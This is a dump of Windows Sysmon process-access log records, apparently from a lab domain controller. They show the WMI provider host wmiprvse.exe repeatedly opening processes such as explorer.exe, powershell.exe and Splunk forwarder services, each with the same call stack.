16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 